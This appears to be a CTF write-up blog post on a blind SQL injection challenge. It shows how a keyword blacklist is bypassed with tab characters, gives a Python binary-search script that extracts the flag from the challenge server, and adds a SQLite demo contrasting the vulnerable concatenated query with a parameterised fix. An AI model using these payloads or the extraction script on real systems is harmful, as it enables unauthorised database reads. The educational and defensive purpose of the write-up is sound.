
[CISCN2019 North China Division Day2 Web1] Hack World

  • Testing process
    Guessed that certain characters were being filtered.

Further testing showed that union, #, and, or, the space character and /**/ are all filtered.
Parentheses () work, so functions can be used.
Tab works; tried if(ascii(substr((select flag from flag),1,1))=ascii('f'),1,2) (with tabs in place of the spaces) and it succeeded.
Since functions work, if(ascii(substr((select(flag)from(flag)),1,1))=ascii('f'),1,2) works the same way,
and the response is Hello, glzjin wants a girlfriend.

  • exp
# binary search over the printable ASCII range (33..126) for each flag character
import time

import requests

url = "http://986c9ab8-6a34-4259-a950-a4214f363284.node3.buuoj.cn/index.php"
key = {"id": ""}
flag = ""

for length in range(1, 100):
    l = 33
    r = 126
    mid = (l + r) // 2
    while l < r:
        print(l, r, mid)
        time.sleep(0.01)  # throttle: sending too fast drops the connection
        # \t instead of spaces, because spaces are filtered but tabs are not
        key["id"] = "if(ascii(substr((select\tflag\tfrom\tflag),{},1))>{},1,2)".format(length, mid)
        resp = requests.post(url, data=key)
        if 'Hello' in resp.text:   # id=1 -> the character is greater than mid
            l = mid + 1
        else:                      # id=2 -> the character is at most mid
            r = mid
        mid = (l + r) // 2
    # loop ends with l == r == mid, the character's ASCII value
    flag += chr(mid)
    print(flag)
    if flag[-1] == '}':
        print(flag)
        break

Sending requests too fast caused the connection to drop, so a delay was added.
v_v
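The reason the challenge falls to this is the filter design, not the particular payload: a token blacklist (union, #, and, or, space, /**/) is bypassed by any whitespace it did not list, while a parameterised query is indifferent to the content of the value. The following is an added example, not code from the writeup or the challenge, showing both halves against an in-memory SQLite database. The blacklist reproduces only the tokens the writeup lists (an assumption about the real filter), the table contents and the flag are constructed, and because SQLite has no if() or ascii(), the CASE/unicode() form stands in for the MySQL condition (also an assumption).

```python
import sqlite3

# Assumption: the challenge's filter is modelled only by the tokens the writeup found blocked.
BLOCKED_TOKENS = ["union", "#", "and", "or", " ", "/**/"]

# Condition shape from the writeup (MySQL if()/ascii()), position 1, threshold 101 filled in.
PAGE_PAYLOAD = "if(ascii(substr((select\tflag\tfrom\tflag),1,1))>101,1,2)"

# SQLite stand-in for the same condition: CASE and unicode() replace MySQL's if() and ascii()
# (assumption, used only so the example runs offline). {} receives the threshold.
SQLITE_PAYLOAD = "case\twhen\tunicode(substr((select\tflag\tfrom\tflag),1,1))>{}\tthen\t1\telse\t2\tend"

HELLO = "Hello, glzjin wants a girlfriend."


def is_blocked(value: str) -> bool:
    """Blacklist check: reject the input if any blocked token appears (case-insensitive)."""
    lowered = value.lower()
    return any(tok in lowered for tok in BLOCKED_TOKENS)


def make_db() -> sqlite3.Connection:
    """In-memory database with constructed rows standing in for the challenge's tables."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table hello(id integer, content text)")
    conn.execute("create table flag(flag text)")
    conn.executemany("insert into hello values(?, ?)", [
        (1, HELLO),                          # the response the writeup keys on
        (2, "constructed row for id=2"),     # constructed second row
    ])
    conn.execute("insert into flag values(?)", ("flag{constructed}",))  # constructed flag
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, user_id: str):
    """Blacklist, then string-concatenate into SQL: the pattern the challenge models (unsafe)."""
    if is_blocked(user_id):
        return "SQL Injection Checked."      # constructed rejection text
    row = conn.execute("select content from hello where id=" + user_id).fetchone()
    return row[0] if row else None


def safe_lookup(conn: sqlite3.Connection, user_id: str):
    """The fix: bind the value as a parameter, so it can never change the query's structure."""
    row = conn.execute("select content from hello where id=?", (user_id,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print("blacklist stops spaces:", is_blocked("select flag from flag"))
    print("blacklist stops tabs:  ", is_blocked(PAGE_PAYLOAD))
    print("vulnerable, 'f' > 101: ", vulnerable_lookup(db, SQLITE_PAYLOAD.format(101)))
    print("vulnerable, 'f' > 102: ", vulnerable_lookup(db, SQLITE_PAYLOAD.format(102)))
    print("parameterised, same input:", safe_lookup(db, SQLITE_PAYLOAD.format(101)))
```

With the vulnerable lookup the two thresholds select different rows, which is exactly the boolean oracle the binary search above drives; with the parameterised lookup the same input is compared as a literal against the id column, matches nothing, and no oracle exists. Blacklists only ever enumerate the variants their author thought of; the binding is the control.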

posted @ 2020-11-09 14:34  _sunix